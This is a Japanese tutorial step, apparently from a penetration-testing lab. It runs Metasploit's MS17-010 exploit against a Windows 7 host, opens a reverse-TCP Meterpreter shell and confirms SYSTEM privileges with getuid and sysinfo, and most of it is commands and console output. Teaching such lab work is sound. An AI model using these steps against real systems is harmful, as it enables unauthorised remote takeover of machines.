エクスプロイトを実行し、Meterpreter セッションを確立する
このステップでは、すべてのオプションが構成された状態で、エクスプロイトを起動し、ターゲットマシンを制御します。
すべての準備が完了しました。エクスプロイトが選択され、ターゲットが設定され、ペイロードが選択されました。攻撃を開始するには、exploit コマンドを使用するだけです。
exploit
Metasploit はターゲットの脆弱性を悪用しようとします。作業中にいくつかのステータスメッセージが表示されます。成功すると、エクスプロイトは Meterpreter ペイロードを配信し、「WIN!」というメッセージと新しいセッションが開かれたことを示すメッセージが表示されます。
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
meterpreter > プロンプトは成功を意味します!これで、被害者マシンへのリモートシェルが取得できました。制御を証明するために、getuid コマンドを実行して、どのユーザーアカウントで実行されているかを確認してください。
getuid
出力は次のようになります。
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM は、Windows システムにおける最高の権限レベルです。ターゲットを正常に侵害しました。sysinfo を実行してシステム情報を取得することもできます。
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
おめでとうございます。MS17-010 のエクスプロイトに成功しました。